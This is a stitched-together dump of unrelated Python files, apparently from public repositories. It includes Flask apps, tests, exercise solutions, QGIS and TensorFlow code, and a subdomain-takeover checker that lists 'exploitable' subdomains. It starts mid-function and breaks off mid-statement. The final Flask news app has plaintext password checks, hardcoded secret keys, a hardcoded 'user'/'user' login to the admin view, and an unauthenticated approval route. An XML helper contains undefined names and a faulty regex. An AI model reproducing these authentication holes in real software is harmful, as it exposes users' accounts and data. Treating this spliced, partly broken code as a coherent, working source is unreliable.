repr(self).lower() < repr(other).lower() def __hash__(self) -> int: key = self.marker.name.lower() if self.fluor_sensitive and self.marker.fluor: key += self.marker.fluor.lower() if self.anti_sensitive and self.marker.anti: key += self.marker.anti.lower() return hash(key) <gh_stars>1-10 import csv import StringIO from flask import current_app def getCsvResponseFromJsonList(json_list): output = StringIO.StringIO() headers = ["Date", "Employee ID", "<NAME>", "Store/Dept", "Amount Requested", "Review", "Amount Awarded", "Date Awarded", "Comments", "Date of Event"] writer = csv.writer(output, dialect='excel') writer.writerow(headers) for item in json_list: req_date = item['createdDate'] az_name = '%s %s %s' % (item['requestContent']['applicantInfo'].get('firstName'),\ item['requestContent']['applicantInfo'].get('middleName'),\ item['requestContent']['applicantInfo'].get('lastName')) emp_id = item['requestContent']['applicantInfo'].get('employeeId') dept_no = item['requestContent']['applicantInfo'].get('storeDeptNo') amount_req = item['requestContent']['assistanceRequested'].get('amountRequested') review = item['requestContent']['reviewDetails'].get('review') amount_awarded = item['requestContent']['reviewDetails'].get('amountAwarded') date_awarded = item['requestContent']['reviewDetails'].get('dateAwarded') comments = item['requestContent']['reviewDetails'].get('comments') event_date = item['requestContent']['incidentInfo'].get('eventDate') writer.writerow([req_date, emp_id, az_name, dept_no, amount_req, review, amount_awarded, date_awarded, comments, event_date]) results = output.getvalue() output.close() return results # It's impossible not to know the dice game. Please, write a # program that will imitate a roll of one of the dice with the help # of an appropriate random function. # Thus, your task is just to generate one integer in the range from # 1 to 6 and print it. import random # this line is needed for us to check the results, don't modify it random.seed(int(input())) # use a function from the random module in the next line print(random.randrange(1, 7))<filename>app/__init__.py from flask import Flask #from flask_heroku import Heroku from flask_sqlalchemy import SQLAlchemy from flask_login import LoginManager from flask_cors import CORS, cross_origin import os app = Flask(__name__) app.config.from_object(os.environ['APP_SETTINGS']) app.config['PROPAGATE_EXCEPTIONS'] = True #heroku = Heroku(app) CORS(app) login_manager = LoginManager() login_manager.init_app(app) login_manager.login_view = 'login' db = SQLAlchemy(app) from app import views import Command as Cmd import JTarget import JFIO import JEnum import JDto import pickle import os from terminaltables import AsciiTable class Command(Cmd.Command) : def __init__(self) : super().__init__() # Instruction of this command self.command = "dto" # Title of this command self.title = "Domain takeover Checker" # Description of this command self.description = "Finding hijacking available domains." # Usage of this command self.usage = "dto <domain>" def call(self, func) : return self.functions[func]() def run(self, command=[]) : if len(command) == 0 : self.printUsage() return mJTarget = JTarget.JTarget(command[0]) mJDto = JDto.JDto(mJTarget.element("domain")) search = True if os.path.exists(JEnum.takeover + mJTarget.element('domain') + ".bin") : search = False if input("Already checked takeover available. Do you want to recheck? (y/N) : ").upper() == "Y" : search = True tablesKey = [["IDX", "DOMAIN"]] if search : res = mJDto.run() if res == False : print("Please run 'subdomain' firstly.") return idx = 0 tables = [] for k, v in res.items() : if v : idx += 1 tables.append([idx, k]) with open(JEnum.takeover + mJTarget.element('domain') + ".bin", "wb") as f : pickle.dump(tables, f) mJTarget.element("takeover", idx) else : with open(JEnum.takeover + mJTarget.element('domain') + ".bin", "rb") as f : tables = pickle.load(f) asciiTable = AsciiTable(tablesKey + tables, "Exploitable Subdomain List") print(asciiTable.table) import keras import pytest import condense import sys sys.path.append('tests/keras') from models import iris @pytest.fixture def example_model(): """Prepare test keras model.""" return iris() def test_simple_one_shot(example_model): """Simple one shot pruning run.""" assert condense.one_shot(example_model, 0.5) <reponame>cyber-republic/elastos-smartweb-service<filename>grpc_adenine/database/user.py # The examples in this file come from the Flask-SQLAlchemy documentation # For more information take a look at: # http://flask-sqlalchemy.pocoo.org/2.1/quickstart/#simple-relationships from datetime import datetime from grpc_adenine.database import (connection as db) """ Users table is mapped to the elastos_console database. Users table has the user information which is stored in it during the registration. """ class Users(db.Model): id = db.Column(db.Integer, primary_key=True) did = db.Column(db.String(64), unique=True, nullable=False) created_on = db.Column(db.DateTime, nullable=False) last_logged_on = db.Column(db.DateTime, nullable=False) def __init__(self, did, created_on=None, last_logged_on=None): self.did = did if created_on is None: created_on = datetime.utcnow() self.created_on = created_on self.last_logged_on = last_logged_on def _repr_(self): return "(did={})"\ .format(self.did) <reponame>dfface/DoctorKG from .standard import * from .few_shot import * class LoginResponse: def __init__( self, access_token: str, fresh_token: str, token_type: str = "bearer" ): self.access_token = access_token self.fresh_token = fresh_token self.token_type = token_type def json(self): return dict( access_token=self.access_token, fresh_token=self.fresh_token, token_type=self.token_type )from datetime import timedelta, datetime import hashlib import os import sendwithus import urllib def unix_time_millis(dt): epoch = datetime.utcfromtimestamp(0) return int((dt - epoch).total_seconds()) def generate_token(data): hash = hashlib.sha256() hash.update(os.environ['EMAIL_TOKEN_SALT']) hash.update(data) return hash.hexdigest() def generate_uri(route, email_address, expiration): uri = route uri += '?email=' + email_address uri += '&expires=' + expiration return uri def create_link(email_address, route): expires = datetime.utcnow() + timedelta(days=1) uri = generate_uri(route, urllib.quote(email_address), str(unix_time_millis(expires))) uri += '&token=' + generate_token(uri) return uri def verify_link(route, email_address, expiration, token): if datetime.fromtimestamp(float(expiration)) < datetime.utcnow(): return False uri = generate_uri(route, urllib.quote(email_address), expiration) return token == generate_token(uri) def send_welcome_email(email_address): api_key = os.environ['SEND_WITH_US'] set_password_link = create_link(email_address, 'password') swu = sendwithus.api(api_key) swu.send( email_id='tem_58MQPDcuQvGKoXG3aVp4Zb', recipient={'address': email_address}, email_data={'setPasswordLink': set_password_link}) def send_password_reset_email(email_address): api_key = os.environ['SEND_WITH_US'] set_password_link = create_link(email_address, 'password') swu = sendwithus.api(api_key) swu.send( email_id='tem_shSnhmqCSMAwdLbPhuwY4U', recipient={'address': email_address}, email_data={'setPasswordLink': set_password_link}) <gh_stars>1-10 def add(x,y): return (x+y) def sub(x,y): return (x-y) <reponame>c-abird/meshio<filename>test/test_xdmf.py import numpy import pytest import helpers import meshio test_set_full = [ helpers.line_mesh, helpers.tri_mesh, helpers.line_tri_mesh, helpers.tri_mesh_2d, helpers.triangle6_mesh, helpers.quad_mesh, helpers.quad8_mesh, helpers.tri_quad_mesh, helpers.tet_mesh, helpers.tet10_mesh, helpers.hex_mesh, helpers.hex20_mesh, helpers.add_point_data(helpers.tri_mesh, 1), helpers.add_cell_data(helpers.tri_mesh, [("a", (), numpy.float64)]), ] test_set_reduced = [ helpers.tri_mesh, helpers.tri_mesh_2d, helpers.quad_mesh, helpers.tri_quad_mesh, helpers.tet_mesh, helpers.hex_mesh, helpers.add_point_data(helpers.tri_mesh, 1), helpers.add_cell_data(helpers.tri_mesh, [("a", (), numpy.float64)]), ] @pytest.mark.parametrize("mesh", test_set_full) @pytest.mark.parametrize("data_format", ["XML", "Binary", "HDF"]) def test_xdmf3(mesh, data_format): def write(*args, **kwargs): return meshio.xdmf.write(*args, data_format=data_format, **kwargs) helpers.write_read(write, meshio.xdmf.read, mesh, 1.0e-14) # HDF5 compressed I/O @pytest.mark.parametrize("mesh", test_set_full) def test_compression(mesh): def write(*args, **kwargs): return meshio.xdmf.write(*args, data_format="HDF", compression="gzip", **kwargs) helpers.write_read(write, meshio.xdmf.read, mesh, 1.0e-14) def test_generic_io(): helpers.generic_io("test.xdmf") # With additional, insignificant suffix: helpers.generic_io("test.0.xdmf") def test_time_series(): # write the data filename = "out.xdmf" with meshio.xdmf.TimeSeriesWriter(filename) as writer: writer.write_points_cells(helpers.tri_mesh_2d.points, helpers.tri_mesh_2d.cells) n = helpers.tri_mesh_2d.points.shape[0] times = numpy.linspace(0.0, 1.0, 5) point_data = [ { "phi": numpy.full(n, t), "u": numpy.full(helpers.tri_mesh_2d.points.shape, t), } for t in times ] for t, pd in zip(times, point_data): writer.write_data( t, point_data=pd, cell_data={"a": {"triangle": [3.0, 4.2]}} ) # read it back in with meshio.xdmf.TimeSeriesReader(filename) as reader: points, cells = reader.read_points_cells() for k in range(reader.num_steps): t, pd, cd = reader.read_data(k) assert numpy.abs(times[k] - t) < 1.0e-12 for key, value in pd.items(): assert numpy.all(numpy.abs(value - point_data[k][key]) < 1.0e-12) # def test_information_xdmf(): # mesh_out = meshio.Mesh( # numpy.array( # [[0.0, 0.0, 0.0], [1.0, 0.0, 0.0], [1.0, 1.0, 0.0], [0.0, 1.0, 0.0]] # ) # / 3, # [("triangle", numpy.array([[0, 1, 2], [0, 2, 3]]))], # field_data={ # "bottom": numpy.array([1, 1]), # "right": numpy.array([2, 1]), # "top": numpy.array([3, 1]), # "left": numpy.array([4, 1]), # }, # ) # # write the data # points, cells, field_data = mesh_out.points, mesh_out.cells, mesh_out.field_data # # assert cells[0].type == "triangle" # meshio.write( # "mesh.xdmf", # meshio.Mesh(points=points, cells=[cells[0]], field_data=field_data), # ) # # # read it back in # mesh_in = meshio.read("mesh.xdmf") # assert len(mesh_in.field_data) == len(mesh_out.field_data) if __name__ == "__main__": test_time_series() N = int(input()) A = 0 B = 0 M = 1 while N != 0: if N % 10 == 7: A += 6 * M B += 1 * M else: A += (N % 10) * M N //= 10 M *= 10 print(A, B) import os class Config(object): DEBUG = False class DevelopmentConfig(Config): DEBUG = True SQLALCHEMY_DATABASE_URI = os.getenv('SQLALCHEMY_DATABASE_URI', 'postgresql://postgres@localhost/registermetadata') class TestConfig(Config): DEBUG = True SQLALCHEMY_DATABASE_URI = os.getenv('SQLALCHEMY_DATABASE_URI', 'postgresql://registermetadata:registermetadata@localhost/registermetadata') <gh_stars>10-100 ''' xml: general functions for parsing xml ''' import re import os import tarfile import xmltodict from wordfish.utils import get_url def get_xml_tree(tarball): '''get_xml_tree: get xmltree from a tarball (.tar.gz) file (appropriate for pubmed open content) Parameters ========== tarball: path (str) full path to .tar.gz file Returns ======= raw: str raw text from the xml file ''' if re.search("[.tar.gz]",tarball): raw = extract_xml_compressed(paper) else: raw = read_xml(tarball) return raw def recursive_text_extract(xmltree,element_name): '''recursive_text_extract Return text for xml tree elements with element_name Parameters ========== xmltree: an xmltree object ''' text = [] queue = [] record_ids = [] for elem in reversed(list(xmltree)): queue.append(elem) while (len(queue) > 0): current = queue.pop() if current.text != None: text.append(current.text) if element_name in current.keys(): record_ids.append(current.text) if len(list(current)) > 0: for elem in reversed(list(current)): queue.append(elem) return record_ids def extract_xml_compressed(tarball): '''extract_xml_compressed Read XML from compressed file ''' tar = tarfile.open(tarball, 'r:gz') for tar_info in tar: if os.path.splitext(tar_info.name)[1] == ".nxml": print("Extracting text from %s" %(tar_info.name)) file_object = tar.extractfile(tar_info) return file_object.read().replace('\n', '') def read_xml_url(url): page = get_url(url) return xmltodict.parse(page) def read_xml(xml): '''read_xml Extract text from xml or nxml file Parameters ========== xml: path/str path to xml file Returns ======= text with newlines replaced with "" ''' with open (xml, "r") as myfile: return myfile.read().replace('\n', '') def crop_text(text,remove_before="<abstract>",remove_after="<ref-list>"): '''crop_text Cut out article sections we aren't interested in ''' # Remove everything before abstract start = re.compile(remove_before) end = re.compile(remove_after) start = start.search(text) end = end.search(text) return text[start.start():end.start()] def remove_formatting(text,to_remove=None): if to_remove == None: to_remove = ["<italic>","<bold>","<p>","<sub>","<table>","<td>","<tr>"] for remove in to_remove: text = text.replace(remove,"") text = text.replace(remove.replace("<","</"),"") return text def search_text(text,terms): '''search_text Search text for list of terms, return list of match counts ''' vector = np.zeros(len(terms)) for t in range(0,len(terms)): expression = re.compile("\s%s\s|\s%s\." %(terms[t],terms[t])) match = expression.findall(text) vector[t] = len(match) return vector <gh_stars>1-10 from Module import AbstractModule class Module(AbstractModule): def __init__(self): AbstractModule.__init__(self) def run( self, network, antecedents, out_attributes, user_options, num_cores, outfile): import os import shutil import math from Betsy import bie3 import arrayio from genomicode import htmllib from genomicode import parselib outfile_folder = outfile outfile = os.path.join(outfile_folder, 'report.html') if not os.path.exists(outfile_folder): os.mkdir(outfile_folder) result_files = [] for data_node in antecedents: filename = data_node.identifier new_name = os.path.join(outfile_folder, os.path.split(filename)[-1]) if os.path.isdir(filename): shutil.copytree(filename, new_name) else: shutil.copyfile(filename, new_name) result_files.append(os.path.split(new_name)[-1]) (data_node1, data_node2, data_node3, data_node4, data_node5, data_node6, data_node7, data_node8, data_node9, data_node10, data_node11) = antecedents #write the report.html #def highlight(s): # from genomicode import htmllib # return htmllib.SPAN(s, style="background-color:yellow") #def smaller(s): # from genomicode import htmllib # return htmllib.FONT(s, size=-1) try: lines = [] w = lines.append w("<HTML>") title = "Classification Results" x = parselib.remove_all_tags(title) w(htmllib.HEAD(htmllib.TITLE(x))) w("<BODY>") w(htmllib.CENTER(htmllib.H1(title))) #------------------------------------ w(htmllib.H3("SVM")) w(htmllib.P()) w(htmllib.A("Methods", href="#methods_svm")) w(htmllib.P()) #------------------------------------ whole_row = [] name = 'Table 1: Table of genes used in classification' w(htmllib.B(name)) w(htmllib.P()) M = arrayio.read(os.path.join(outfile_folder, result_files[0])) ids = M._row_order genes = M.row_names(ids[0]) ncolumn = 3 nrow = 8 rows = [] for i in range(min(nrow, len(genes) / ncolumn)): a = [] for j in range(0, ncolumn): a.append('<td>' + genes[ncolumn * i + j] + '</td>') x = htmllib.TR("\n".join(a)) rows.append(x) more_genes = 0 if len(genes) > ncolumn * nrow: more_genes = len(genes) - ncolumn * nrow y = htmllib.TR(htmllib.TD(htmllib.TABLE("\n".join(rows), border=1, cellpadding=3, cellspacing=0), align='CENTER') + htmllib.TD(htmllib.A(htmllib.IMG(height=400, src=result_files[5]), href=result_files[5]), align='CENTER')) #--------------------------------- whole_row.append(y) y = htmllib.TR(htmllib.TD( htmllib.A(str(more_genes) + ' more genes', result_files[0]), align='LEFT') + htmllib.TD(htmllib.B( 'Figure 1: This figure shows the PCA plot of samples colored by prediction'), align='CENTER')) whole_row.append(y) x = htmllib.TR(htmllib.TD(htmllib.A(htmllib.IMG(height=400, src=result_files[4]), href=result_files[4]), align="CENTER") + htmllib.TD(htmllib.A(htmllib.IMG(height=400, src=result_files[2]), href=result_files[2]), align="CENTER")) whole_row.append(x) x = htmllib.TR( htmllib.TH(htmllib.A("Figure 2. Loocv result on training data", result_files[3]), align="CENTER") + htmllib.TH(htmllib.A("Figure 3. Prediction result on test data", result_files[1]), align="CENTER")) whole_row.append(x) w(htmllib.TABLE("\n".join(whole_row), border=None, cellpadding=3, cellspacing=0)) w(htmllib.P()) #------------------------------------ w(htmllib.H3("Weighted Voting")) w(htmllib.P()) w(htmllib.A("Methods", href="#methods_wv")) w(htmllib.P()) #------------------------------------ whole_row = [] name = 'Table 1: Table of genes used in classification' w(htmllib.B(name)) w(htmllib.P()) nfeature = 10 if 'num_features_value' in user_options: nfeature = user_options['num_features_value'] M = arrayio.read(os.path.join(outfile_folder, result_files[0])) ids = M._row_order genes = M.row_names(ids[0])[0:nfeature] nrow = min(8, int(math.ceil(float(len(genes)) / ncolumn))) ncolumn = 3 if len(genes) < nrow * ncolumn: genes.extend([''] * (nrow * ncolumn - len(genes))) rows = [] for i in range(nrow): a = [] for j in range(ncolumn): a.append('<td>' + genes[ncolumn * i + j] + '</td>') x = htmllib.TR("\n".join(a)) rows.append(x) more_genes = 0 if len(genes) > ncolumn * nrow: more_genes = len(genes) - ncolumn * nrow y = htmllib.TR(htmllib.TD(htmllib.TABLE("\n".join(rows), border=1, cellpadding=3, cellspacing=0), align='CENTER') + htmllib.TD(htmllib.A(htmllib.IMG(height=400, src=result_files[10]), href=result_files[10]), align='CENTER')) #--------------------------------- whole_row.append(y) y = htmllib.TR(htmllib.TD( htmllib.A(str(more_genes) + ' more genes', result_files[0]), align='LEFT') + htmllib.TD(htmllib.B( 'Figure 4: This figure shows the PCA plot of samples colored by prediction'), align='CENTER')) whole_row.append(y) x = htmllib.TR(htmllib.TD(htmllib.A(htmllib.IMG(height=400, src=result_files[9]), href=result_files[9]), align="CENTER") + htmllib.TD(htmllib.A(htmllib.IMG(height=400, src=result_files[7]), href=result_files[7]), align="CENTER")) whole_row.append(x) x = htmllib.TR( htmllib.TH(htmllib.A("Figure 2. Loocv result on training data", result_files[8]), align="CENTER") + htmllib.TH(htmllib.A("Figure 3. Prediction result on test data", result_files[6]), align="CENTER")) whole_row.append(x) w(htmllib.TABLE("\n".join(whole_row), border=None, cellpadding=3, cellspacing=0)) w(htmllib.P()) #-------------------------------- w(htmllib.HR()) w(htmllib.A("<methods_svm>", name="methods_svm")) w('To generate these files, I ran the following analysis:') bie3.plot_network_gv(os.path.join(outfile_folder, "network.png"), network) w(htmllib.P()) w(htmllib.A(htmllib.IMG(height=500, src="network.png"), href="network.png")) w(htmllib.CENTER(htmllib.H2("SVM Methods"))) w(htmllib.H3("Prediction Result")) w('I used the following parameters:') rows = [] x = htmllib.TR(htmllib.TH("Parameter", align="LEFT") + htmllib.TH("Value", align="LEFT")) rows.append(x) for key in data_node2.data.attributes.keys(): x = htmllib.TR(htmllib.TD(key, align="LEFT") + htmllib.TD(data_node2.data.attributes[key], align="LEFT")) rows.append(x) w(htmllib.TABLE("\n".join(rows), border=1, cellpadding=3, cellspacing=0)) w(htmllib.P()) w(htmllib.A("<methods_wv>", name="methods_wv")) w(htmllib.CENTER(htmllib.H2("Weighted Voting Methods"))) w(htmllib.H3("Prediction Result")) w('I used the following parameters:') rows = [] x = htmllib.TR(htmllib.TH("Parameter", align="LEFT") + htmllib.TH("Value", align="LEFT")) rows.append(x) for key in data_node7.data.attributes.keys(): x = htmllib.TR(htmllib.TD(key, align="LEFT") + htmllib.TD(data_node7.data.attributes[key], align="LEFT")) rows.append(x) w(htmllib.TABLE("\n".join(rows), border=1, cellpadding=3, cellspacing=0)) w(htmllib.P()) # Write out the footer. #time_str = parselib.pretty_date(time.time()) #hostname = pretty_hostname() w(htmllib.P()) w(htmllib.HR()) #w(htmllib.EM( # "This analysis was run on %s on %s. \n" % # (time_str, hostname))) w("</BODY>") w("</HTML>") x = "\n".join(lines) + "\n" open(outfile, 'w').write(x) except: raise def name_outfile(self, antecedents, user_options): filename = 'report' return filename <reponame>ugurcan-sonmez-95/HackerRank_Problems<filename>Algorithms/Strings/HackerRank_in_a_String/main.py ### HackerRank_in_a_String! - Solution def hackerrankInString(): query_count = int(input()) while query_count: s = input() s1 = "hackerrank" count, temp = 0, 0 for i in range(len(s1)): for j in range(temp, len(s)): if s[j] == s1[i]: count += 1 temp = j+1 break ans = "YES" if (count == 10) else "NO" print(ans) query_count -= 1 hackerrankInString()from qgis.core import * from qgis.gui import * from PyQt4.QtGui import * from PyQt4.QtCore import * class CrossSymbolLayer(QgsMarkerSymbolLayerV2): def __init__(self, length=10.0, width=2.0): QgsMarkerSymbolLayerV2.__init__(self) self.length = length self.width = width def layerType(self): return "Cross" def properties(self): return {'length' : self.length, 'width' : self.width} def clone(self): return CrossSymbolLayer(self.length, self.width) def startRender(self, context): self.pen = QPen() self.pen.setWidth(self.width) def stopRender(self, context): self.pen = None def renderPoint(self, point, context): left = point.x() - self.length right = point.x() + self.length bottom = point.y() - self.length top = point.y() + self.length if context.selected(): self.pen.setColor(context.selectionColor()) else: self.pen.setColor(self.color()) painter = context.renderContext().painter() painter.setPen(self.pen) painter.drawLine(left, bottom, right, top) painter.drawLine(right, bottom, left, top) class CrossSymbolLayerWidget(QgsSymbolLayerV2Widget): def __init__(self, parent=None): QgsSymbolLayerV2Widget.__init__(self, parent) self.layer = None self.lengthField = QSpinBox(self) self.lengthField.setMinimum(1) self.lengthField.setMaximum(100) self.connect(self.lengthField, SIGNAL("valueChanged(int)"), self.lengthChanged) self.widthField = QSpinBox(self) self.widthField.setMinimum(1) self.widthField.setMaximum(100) self.connect(self.widthField, SIGNAL("valueChanged(int)"), self.widthChanged) self.form = QFormLayout() self.form.addRow("Length", self.lengthField) self.form.addRow("Width", self.widthField) self.setLayout(self.form) def setSymbolLayer(self, layer): if layer.layerType() == "Cross": self.layer = layer self.lengthField.setValue(layer.length) self.widthField.setValue(layer.width) def symbolLayer(self): return self.layer def lengthChanged(self, n): self.layer.length = n self.emit(SIGNAL("changed()")) def widthChanged(self, n): self.layer.width = n self.emit(SIGNAL("changed()")) class CrossSymbolLayerMetadata(QgsSymbolLayerV2AbstractMetadata): def __init__(self): QgsSymbolLayerV2AbstractMetadata.__init__(self, "Cross", "Cross Marker", QgsSymbolV2.Marker) def createSymbolLayer(self, properties): if "length" in properties: length = int(properties['length']) else: length = 10 if "width" in properties: width = int(properties['width']) else: width = 2 return CrossSymbolLayer(length, width) def createSymbolLayerWidget(self, layer): return CrossSymbolLayerWidget() registry = QgsSymbolLayerV2Registry.instance() registry.addSymbolLayerType(CrossSymbolLayerMetadata()) <reponame>t-reppert/PythonMorsels from decimal import Decimal import unittest from perfect_square import is_perfect_square class IsPerfectSquareTests(unittest.TestCase): """Tests for is_perfect_square.""" def test_small_number(self): self.assertTrue(is_perfect_square(1)) self.assertTrue(is_perfect_square(4)) self.assertFalse(is_perfect_square(8)) self.assertFalse(is_perfect_square(35)) def test_4_digit_number(self): self.assertTrue(is_perfect_square(5776)) self.assertFalse(is_perfect_square(9306)) def test_big_number(self): self.assertTrue(is_perfect_square(1586375448590241)) self.assertFalse(is_perfect_square(1420958445736851)) def test_non_real_numbers(self): self.assertFalse(is_perfect_square(4.5)) with self.assertRaises(TypeError): is_perfect_square(1j) with self.assertRaises(TypeError): is_perfect_square('hello') def test_decimal_number(self): square_number = Decimal('100') self.assertTrue(is_perfect_square(square_number)) self.assertFalse(is_perfect_square(square_number-1)) self.assertFalse(is_perfect_square(square_number+1)) # To test the Bonus part of this exercise, comment out the following line <EMAIL> def test_negative_numbers(self): square_number = -4 self.assertFalse(is_perfect_square(square_number)) self.assertFalse(is_perfect_square(square_number-1)) self.assertFalse(is_perfect_square(square_number+1)) # To test the Bonus part of this exercise, comment out the following line <EMAIL> def test_really_big_numbers(self): n = 838382848348234**2 m = n**2 m = 8383828483252752341748234**2 self.assertTrue(is_perfect_square(n)) self.assertFalse(is_perfect_square(n-1)) self.assertFalse(is_perfect_square(n+1)) self.assertTrue(is_perfect_square(m)) self.assertFalse(is_perfect_square(m-1)) self.assertFalse(is_perfect_square(m+1)) # To test the Bonus part of this exercise, comment out the following line <EMAIL> def test_complex_numbers(self): self.assertTrue(is_perfect_square(-4, complex=True)) self.assertTrue(is_perfect_square(-100, complex=True)) self.assertFalse(is_perfect_square(-1000, complex=True)) self.assertTrue(is_perfect_square(512j, complex=True)) self.assertFalse(is_perfect_square(100j, complex=True)) self.assertTrue(is_perfect_square(-5+12j, complex=True)) with self.assertRaises(TypeError): is_perfect_square(-4, True) # complex must be a keyword argument if __name__ == "__main__": unittest.main()import argparse import os def get_current_path(): """Special case for Windows Docker Toolbox users.""" current_path = os.getcwd() if os.getenv("DOCKER_TOOLBOX_INSTALL_PATH") is not None: if len(os.environ["DOCKER_TOOLBOX_INSTALL_PATH"]): current_path = current_path.replace(":", "") current_path = current_path.replace("\\\\", "/") current_path = current_path.replace("\\", "/") current_path = current_path.replace("C", "c") current_path = f"/{current_path}" else: current_path = f'"{current_path}"' return current_path def main(): parser = argparse.ArgumentParser(add_help=True, description="Run docker image.") parser.add_argument( "command", default="lab", help="Command (notebook | lab | shell)" ) parser.add_argument( "--docker_tag", "-t", default="9dogs/ml:latest", help="Docker image tag" ) parser.add_argument( "--gpus", default=None, help="GPUs to forward to the container (all | 1 | 2 etc.)" ) args = parser.parse_args() path = get_current_path() if args.gpus: gpus = f"--gpus {args.gpus}" else: gpus = "" run_command = ( f"docker run -it --rm -p 4545:4545 {gpus} " f"-v {path}:/notebooks -w /notebooks {args.docker_tag} " f"{args.command}" ) print("Running command: ", run_command) os.system(run_command) if __name__ == "__main__": main() from .Utils import * <filename>tensorstream/common/extremum.py import tensorflow as tf from tensorstream.common import shift from tensorstream.streamable import Streamable class GlobalMinimum(Streamable): def step(self, value, global_min=None, is_first_iteration=True): if global_min is None: global_min = tf.zeros(tf.shape(value), value.dtype) new_min = tf.cond( tf.logical_or( is_first_iteration, tf.less(value, global_min) ), lambda: value, lambda: global_min ) return new_min, (new_min, False), (global_min, is_first_iteration) class GlobalMaximum(Streamable): def step(self, value, global_max=None, is_first_iteration=True): if global_max is None: global_max = tf.zeros(tf.shape(value), value.dtype) new_max = tf.cond( tf.logical_or( is_first_iteration, tf.greater(value, global_max) ), lambda: value, lambda: global_max ) return new_max, (new_max, False), (global_max, is_first_iteration) class LocalExtremum(Streamable): def __init__(self, period): super().__init__() self.period = period class LocalMinimum(LocalExtremum): def __init__(self, period): super().__init__(period) def step(self, value, last_values=None, iteration=0): if last_values is None: shape = self.concat([self.period], tf.shape(value)) last_values = tf.zeros(shape, value.dtype) new_last_values = shift(value, last_values) min_value = tf.cond( tf.less(iteration, self.period - 1), lambda: tf.reduce_min(new_last_values[:iteration + 1]), lambda: tf.reduce_min(new_last_values) ) return min_value, (new_last_values, iteration + 1), (last_values, iteration) class LocalMaximum(LocalExtremum): def __init__(self, period): super().__init__(period) def step(self, value, last_values=None, iteration=0): if last_values is None: shape = self.concat([self.period], tf.shape(value)) last_values = tf.zeros(shape, value.dtype) new_last_values = shift(value, last_values) max_value = tf.cond( tf.less(iteration, self.period - 1), lambda: tf.reduce_max(new_last_values[:iteration + 1]), lambda: tf.reduce_max(new_last_values) ) return max_value, (new_last_values, iteration + 1), (last_values, iteration) import os from flask import Flask, request, flash, url_for, redirect, render_template,session,escape,send_file,make_response from flask_sqlalchemy import SQLAlchemy from tkinter import * from PIL import ImageTk,Image from datetime import datetime import pdfkit app = Flask(__name__) app.secret_key='any' app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///students.sqlite3' app.config['SECRET_KEY'] = "random string" config = pdfkit.configuration(wkhtmltopdf='/usr/bin/wkhtmltopdf') db = SQLAlchemy(app) class tb_login1(db.Model): id = db.Column('student_id', db.Integer, primary_key = True) username = db.Column(db.String(100)) password = db.Column(db.String(50)) city = db.Column(db.String(50)) class tb_Admin1(db.Model): id = db.Column('admin_id', db.Integer, primary_key = True) username = db.Column(db.String(100)) password = db.Column(db.String(50)) class tb_uploads(db.Model): id=db.Column('image_id',db.Integer,primary_key = True) imagename=db.Column(db.String(200)) valid=db.Column(db.String(10)) city=db.Column(db.String(50)) class tb_uploads1(db.Model): id=db.Column('image_id',db.Integer,primary_key = True) imagename=db.Column(db.String(200)) valid=db.Column(db.String(10)) city=db.Column(db.String(50)) date=db.Column(db.String(50)) caption=db.Column(db.String(100)) content=db.Column(db.String(500)) class tb_uploads2(db.Model): id=db.Column('image_id',db.Integer,primary_key = True) imagename=db.Column(db.String(200)) valid=db.Column(db.String(10)) city=db.Column(db.String(50)) date=db.Column(db.String(50)) caption=db.Column(db.String(100)) content=db.Column(db.String(500)) category=db.Column(db.String(50)) class tb_uploads3(db.Model): id=db.Column('image_id',db.Integer,primary_key = True) imagename=db.Column(db.String(200)) Caption=db.Column(db.String(50)) Content=db.Column(db.String(450)) Category=db.Column(db.String(10)) DateTime=db.Column(db.DateTime()) city=db.Column(db.String(10)) Uploadedby=db.Column(db.String(10)) valid=db.Column(db.String(10)) class tb_temp1(db.Model): id=db.Column('timage_id',db.Integer,primary_key=True) class tb_temp2(db.Model): pid=db.Column('timage_id',db.Integer,primary_key=True) id=db.Column(db.Integer) def __init__(self,username,password,city): self.username = username self.password = password self.city = city #UPLOAD_FOLDER = '/home/krunal/projects/news/FlaskWebProject1/uploads' UPLOAD_FOLDER='/home/krunal/projects/news/FlaskWebProject1/uploads' app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER @app.route('/',methods = ['GET', 'POST']) def Login(): if request.method == 'POST': t=tb_temp2.query.all() for y in t: session['tid']=y.id s=tb_login1.query.all() for x in s: if request.form["uname"]==x.username and request.form["pword"]==x.password: session['susername']=x.username session['scity']=x.city session['sid']=x.id return redirect(url_for('home',susername=session['susername'],scity=session['scity'])) elif request.form["uname"]=='user' and request.form["pword"]=='user': return redirect(url_for('show_all')) return redirect(url_for('Login') ) else: #return redirect(url_for('Login')) return render_template('Login.html' ) @app.route('/home', methods = ['GET', 'POST']) def home(): if session['susername']=='z': #return redirect(url_for('Login')) return render_template('Login.html') else: return render_template('home.html',tb_login1 = tb_login1.query.all(),tb_uploads3=tb_uploads3.query.all()) @app.route('/Sports', methods = ['GET', 'POST']) def Sports(): return render_template('sports.html',tb_login1 = tb_login1.query.all(),tb_uploads3=tb_uploads3.query.all()) @app.route('/educational', methods = ['GET', 'POST']) def educational(): return render_template('educational.html',tb_login1 = tb_login1.query.all(),tb_uploads3=tb_uploads3.query.all()) @app.route('/business', methods = ['GET', 'POST']) def business(): return render_template('business.html',tb_login1 = tb_login1.query.all(),tb_uploads3=tb_uploads3.query.all()) @app.route('/lifestyle', methods = ['GET', 'POST']) def lifestyle(): return render_template('lifestyle.html',tb_login1 = tb_login1.query.all(),tb_uploads3=tb_uploads3.query.all()) @app.route('/entertainment', methods = ['GET', 'POST']) def entertainment(): return render_template('entertainment.html',tb_login1 = tb_login1.query.all(),tb_uploads3=tb_uploads3.query.all()) @app.route('/technology', methods = ['GET', 'POST']) def technology(): return render_template('technology.html',tb_login1 = tb_login1.query.all(),tb_uploads3=tb_uploads3.query.all()) @app.route('/show_all', methods = ['GET', 'POST']) def show_all(): return render_template('show_all.html', tb_login1 = tb_login1.query.all(),tb_uploads3 = tb_uploads3.query.all() ) @app.route('/approve_news/<imagepath>', methods = ['GET', 'POST']) def approve_news(imagepath): s=tb_uploads3.query.all() for x in s: if imagepath==x.imagename: x.valid='yes' db.session.commit() return render_template('show_all.html', tb_login1 = tb_login1.query.all(),tb_uploads3 = tb_uploads3.query.all() ) @app.route('/new', methods = ['GET', 'POST']) def new(): if request.method == 'POST': if not request.form['username'] or not request.form['password']: flash('Please enter all the fields', 'error') else: s=tb_login1.query.all() for x in s: if request.form['username']==x.username: flash('username is already taken please try another one','error') return render_template('new.html') if 